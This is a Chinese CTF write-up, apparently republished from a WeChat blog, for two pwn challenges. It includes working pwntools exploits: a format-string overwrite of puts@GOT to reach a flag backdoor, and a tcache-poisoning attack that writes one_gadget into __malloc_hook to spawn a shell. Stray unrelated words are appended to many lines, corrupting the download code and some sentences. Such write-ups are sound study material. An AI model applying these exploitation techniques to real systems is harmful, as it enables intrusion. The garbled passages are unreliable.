题目附件:linux
https://pan.baidu.com/s/1_rwQCWIeII8zTQSdkTgPVwweb
提取码: jpzxshell
感谢 CataLpa 师傅给的题目ubuntu
https://wzt.ac.cn/微信
repeater
32 位的程序,存在很明显的格式化字符串漏洞编辑器
数一下偏移,第四个函数
有个 cat flag 的后门 0x8048616,可是有一个 number 限制,nubmer 要等于 8216 才行,能够直接让他执行 0x8048638 那一块,那就覆写 puts 函数的 got 表把ui
from pwn import *
context.log_level = 'DEBUG'
p = process("./repeater")
elf=ELF('./repeater')
puts_got=elf.got['puts']
p.recvuntil("your msg:")
payload = fmtstr_payload(4,{puts_got:0x8048638})
p.sendline(payload)
p.interactive()
bb_tcache
程序的逻辑挺简单的,free 以后没有置为 NULLthis
另外还提供了 system 的地址,能够直接拿来算 libc 的基址了url
from pwn import *
context.log_level = 'DEBUG'
p=process('bb_tcache')
elf=ELF('bb_tcache')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def alloc():
p.sendlineafter("4. quit!\n","1")
def release():
p.sendlineafter("4. quit!\n","2")
def fill(content):
p.sendlineafter("4. quit!\n","3")
p.sendafter("something.\n",content)
p.recvuntil("need this: ")
sys_addr = int(p.recvuntil('\n', drop=True).strip(), 16)
libc_base = sys_addr - libc.symbols["system"]
malloc_hook = libc_base + libc.symbols["__malloc_hook"]
one_gadget = libc_base + 0x10a45c
alloc()
release()
fill(p64(malloc_hook))
alloc()
alloc()
fill(p64(one_gadget))
alloc()
p.interactive()
首先 malloc 一个,free 以后再去编辑,编辑成 malloc_hook(tcache 不会对 size 进行检查,因此能够直接申请到 malloc_hook 这里)
而后 malloc 两次就申请到了 malloc_hook 那里了,再去编辑就能够把 malloc_hook 改成 one_gadget 的地址,这样去 malloc 的时候就能够拿到 shell
啊啊啊,好简单的说
本文分享自微信公众号 - 陈冠男的游戏人生(CGN-115)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。